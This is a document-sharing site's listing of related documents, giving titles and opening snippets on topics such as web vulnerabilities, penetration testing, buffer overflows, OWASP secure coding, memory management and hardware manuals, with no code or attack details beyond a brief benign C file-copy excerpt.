More information

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

More information

7.1 Our Current Model

7.1 Our Current Model Chapter 7 The Stack In this chapter we examine what is arguably the most important abstract data type in computer science, the stack. We will see that the stack ADT and its implementation are very simple.

More information

MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards

MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards MUSCLE Cryptographic Card Edge Definition for Java 1 Enabled Smartcards David Corcoran Tommaso Cucinotta This document is provided on an as-is basis. Neither the authors nor the MUSCLE project are responsible

More information

Application. Application Layer Security. Protocols. Some Essentials. Attacking the Application Layer. SQL Injection

Application. Application Layer Security. Protocols. Some Essentials. Attacking the Application Layer. SQL Injection Application Layer Security Application Presentation Session TCP UDP IP Data Link Physical Protocols File Transfer Protocol (FTP) Telnet Simple Mail Transfer Protocol (SMTP) Hypertext Transfer Protocol

More information

VISUAL GUIDE to. RX Scripting. for Roulette Xtreme - System Designer 2.0

VISUAL GUIDE to. RX Scripting. for Roulette Xtreme - System Designer 2.0 VISUAL GUIDE to RX Scripting for Roulette Xtreme - System Designer 2.0 UX Software - 2009 TABLE OF CONTENTS INTRODUCTION... ii What is this book about?... iii How to use this book... iii Time to start...

More information

NAND Flash Memories. Understanding NAND Flash Factory Pre-Programming. Schemes

NAND Flash Memories. Understanding NAND Flash Factory Pre-Programming. Schemes NAND Flash Memories Understanding NAND Flash Factory Pre-Programming Schemes Application Note February 2009 an_elnec_nand_schemes, version 1.00 Version 1.00/02.2009 Page 1 of 20 NAND flash technology enables

More information

CLC Server Command Line Tools USER MANUAL

CLC Server Command Line Tools USER MANUAL CLC Server Command Line Tools USER MANUAL Manual for CLC Server Command Line Tools 2.5 Windows, Mac OS X and Linux September 4, 2015 This software is for research purposes only. QIAGEN Aarhus A/S Silkeborgvej

More information

Firefox, Opera, Safari for Windows BMP file handling information leak. September 2008. Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs

Firefox, Opera, Safari for Windows BMP file handling information leak. September 2008. Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs Firefox, Opera, Safari for Windows BMP file handling information leak September 2008 Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs 1. Introduction The bitmap format implementations in Mozilla Firefox

More information

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture

Packet Capture. Document Scope. SonicOS Enhanced Packet Capture Packet Capture Document Scope This solutions document describes how to configure and use the packet capture feature in SonicOS Enhanced. This document contains the following sections: Feature Overview

More information

Java's garbage-collected heap

Java's garbage-collected heap Sponsored by: This story appeared on JavaWorld at http://www.javaworld.com/javaworld/jw-08-1996/jw-08-gc.html Java's garbage-collected heap An introduction to the garbage-collected heap of the Java

More information

PE_ERR_INVALIDJOBNO (501) You have specified a job number that does not exist.

PE_ERR_INVALIDJOBNO (501) You have specified a job number that does not exist. Overview Error Codes This document lists all the error codes and the descriptions that the Crystal Reports Print Engine generates. PE_ERR_NOTENOUGHMEMORY (500) There is not enough memory available to complete

More information

An Insight into Cookie Security

An Insight into Cookie Security An Insight into Cookie Security Today most websites and web based applications use cookies. Cookies are primarily used by the web server to track an authenticated user or other user specific details. This

More information

Hands-on Hacking Unlimited

Hands-on Hacking Unlimited About Zone-H Attacks techniques (%) File Inclusion Shares misconfiguration SQL Injection DNS attack through social engineering Web Server external module intrusion Attack against the administrator/user

More information

Raima Database Manager Version 14.0 In-memory Database Engine

Raima Database Manager Version 14.0 In-memory Database Engine + Raima Database Manager Version 14.0 In-memory Database Engine By Jeffrey R. Parsons, Senior Engineer January 2016 Abstract Raima Database Manager (RDM) v14.0 contains an all new data storage engine optimized

More information

Introduction to Programming

Introduction to Programming Introduction to Programming If you re new to programming, you might be intimidated by code and flowcharts. You might even wonder how you ll ever understand them. This lesson offers some basic ideas and

More information

Appendix. Web Command Error Codes. Web Command Error Codes

Appendix. Web Command Error Codes. Web Command Error Codes Appendix Web Command s Error codes marked with * are received in responses from the FTP server, and then returned as the result of FTP command execution. -501 Incorrect parameter type -502 Error getting

More information

& Data Processing 2. Exercise 3: Memory Management. Dipl.-Ing. Bogdan Marin. Universität Duisburg-Essen

& Data Processing 2. Exercise 3: Memory Management. Dipl.-Ing. Bogdan Marin. Universität Duisburg-Essen Folie a: Name & Data Processing 2 3: Memory Management Dipl.-Ing. Bogdan Marin Fakultät für Ingenieurwissenschaften Abteilung Elektro-und Informationstechnik -Technische Informatik- Objectives Memory Management

More information

Custom Penetration Testing

Custom Penetration Testing Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools

More information

USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION. Integrated Information Systems Group, Ruhr University Bochum, Germany

USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION. Integrated Information Systems Group, Ruhr University Bochum, Germany USING LOCAL NETWORK AUDIT SENSORS AS DATA SOURCES FOR INTRUSION DETECTION Daniel Hamburg,1 York Tüchelmann Integrated Information Systems Group, Ruhr University Bochum, Germany Abstract: The increase of

More information

Scalable Network-Based Buffer Overflow Attack Detection

Scalable Network-Based Buffer Overflow Attack Detection Scalable Network-Based Buffer Overflow Attack Detection Paper ID: 327 14 pages Abstract Buffer overflow attack is the main attack method that most if not all existing malicious worms use to propagate themselves

More information

Virtual Memory. How is it possible for each process to have contiguous addresses and so many of them? A System Using Virtual Addressing

Virtual Memory. How is it possible for each process to have contiguous addresses and so many of them? A System Using Virtual Addressing How is it possible for each process to have contiguous addresses and so many of them? Computer Systems Organization (Spring ) CSCI-UA, Section Instructor: Joanna Klukowska Teaching Assistants: Paige Connelly

More information

Differential Slicing: Identifying Causal Execution Differences for Security Applications

Differential Slicing: Identifying Causal Execution Differences for Security Applications Differential Slicing: Identifying Causal Execution Differences for Security Applications Noah M. Johnson, Juan Caballero, Kevin Zhijie Chen, Stephen McCamant, Pongsin Poosankam, Daniel Reynaud, and Dawn

More information

OWASP Secure Coding Practices Quick Reference Guide

OWASP Secure Coding Practices Quick Reference Guide OWASP Secure Coding Practices Quick Reference Guide Copyright and License Copyright 2010 The OWASP Foundation. This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For

More information

/* File: blkcopy.c. size_t n

/* File: blkcopy.c. size_t n 13.1. BLOCK INPUT/OUTPUT 505 /* File: blkcopy.c The program uses block I/O to copy a file. */ #include main() { signed char buf[100] const void *ptr = (void *) buf FILE *input, *output size_t

More information

Introduction to Information Security

Introduction to Information Security Introduction to Information Security 0368-3065, Spring 2015 Lecture 1: Introduction, Control Hijacking (1/2) Eran Tromer Slides credit: Avishai Wool, Tel Aviv University 1 Administration Lecturer: Eran

More information

Working with Buffers

Working with Buffers University Hamburg Department of Informatics Scientific Computing Research Group Working with Buffers Seminar Paper Seminar Efficient Programming in C Christoph Brauer 0brauer@informatik.uni-hamburg.de

More information

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security

More information

CS Matters in Maryland CS Principles Course

CS Matters in Maryland CS Principles Course CS Matters in Maryland CS Principles Course Curriculum Overview Project Goals Computer Science (CS) Matters in Maryland is an NSF supported effort to increase the availability and quality of high school

More information

Software Development Tools for Embedded Systems. Hesen Zhang

Software Development Tools for Embedded Systems. Hesen Zhang Software Development Tools for Embedded Systems Hesen Zhang What Are Tools? a handy tool makes a handy man What Are Software Development Tools? Outline Debug tools GDB practice Debug Agent Design Debugging

More information